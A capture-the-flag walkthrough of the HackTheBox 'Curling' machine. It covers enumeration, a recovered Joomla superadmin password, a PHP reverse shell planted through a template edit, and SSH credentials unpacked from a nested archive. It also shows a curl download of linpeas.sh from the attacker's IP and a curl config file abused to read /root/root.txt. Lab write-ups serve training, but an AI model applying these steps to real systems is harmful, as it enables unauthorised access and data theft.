HTB Curling: Joomla RCE to Curl Config File Abuse
Begin with binding machine IP to custom domain.
Conduct port scanning sudo nmap -sV -sC curling.htb
Let's check Joomla:
There were nothing valuable in this page. I also conducted a port scan with --script=vuln NSE engine.
sudo nmap -sV --script=vuln --max-rate=10000 curling.htb
It reveals some potentially interesting directories & version number of Joomla which is 3.8.8.
I iterated multiple fuzzing attempts ,yet no juicy information available except the administrator endpoint here is what kind of tools & commands I ran so far.
gobuster dir -u http://curling.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files.txt
gobuster dir -u http://curling.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files.txt
gobuster dir -u http://curling.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-files.txt
gobuster dir -u http://curling.htb -w /usr/share/wordlists/dirb/big.txt
gobuster dir -u http://curling.htb -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://curling.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Furthermore, I applied also -r parameter to fuzz deeply. After a couple of minutes belonging with source code analysis I decided to search for patterns like password hint. However, still did not find anything ,but after I analyzed patiently I found that last line includes secret.txt as hint.
Q3VybGluZzIwMTgh a txt includes such thing like a password. Then I wanted also push this to Cyberchef ->
This sounds like a pass: Curling2018! ,yet username ?
One of the posts mentions about curling and 2018 strings then I saw floris at the end of the thread message.
I tried Floris:Curling2018! and logged as superadmin according to the right side of the side.
Since I was able to sign in directly here. What about using through admin login page.
It works !
Initially, it will be appropriate to use github exploit just because more accessible and direct solution. Plus, it requires authenticated user ,so lets move on it.
Direct run was not possible. Therefore, the best useful way is that create your virtual environment via python -m venv venv then install requirements line by line.
pip install requests
pip install lxml
pip install log_colors
Now usage is easy just to follow the guideline:
The script stucks ,so I manually reach the endpoint where shell payload executed.
/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA=
Generic PentestMonkey works just because application running on PHP on backend side ,but at this time I'll use reverse shell generator's payload.
Start to invoke listener ->
penelope -p 1234
I used Ivan Sencek's payload:
Save and execute PHP script through template preview option which runs server side script.
You must get floris account to get user flag and I discovered a file called password_backup then including weird things.
I searched for BZh91AY and identified such pattern in overthewire challenge.
Let's use ->
xxd -r data > binary
ls binary data
target machine has /usr/bin/xxd binary.
I got permission error on while I was working on floris user then moved tmp directory.
The challenge suggested that identify the file type ->
bunzip2 binary or bzip2 -d binary
We have to go further ->
Now I was dealing with gzip format.
mv binary.out binary.gz
gunzip binary.gz
mv binary binary2.bz2
bunzip2 binary2.bz2 or bzip2 -d binary2.bz2
tar -xf binary2
cat password.txt
5d<wdCbdZu)|hChXll
Now this is the most probably password for SSH of floris.
Gotcha ! ! !
I checked for local privilege escalation vector via sudo -l.
It did not work.
I did not find anything valuable on admin-area directory ,so lets start linpeas.
curl http://10.10.15.57:1212/linpeas.sh -o linpeas.sh
did not useful.
Somehow, admin-area directory includes interesting file formats regarding to the root path.
It points out the localhost then report includes the parsed page.
lets check to parse the page via curl:
Observe that parsing results point out the same pages.
I began to find a way to point to the target machine files to read root flag.
I found a bug bounty report including the usage for these types of purposes:
Try them ->
Alter the content of the input file as below:
url = "file:///root/root.txt"
then read the root flag from cat report
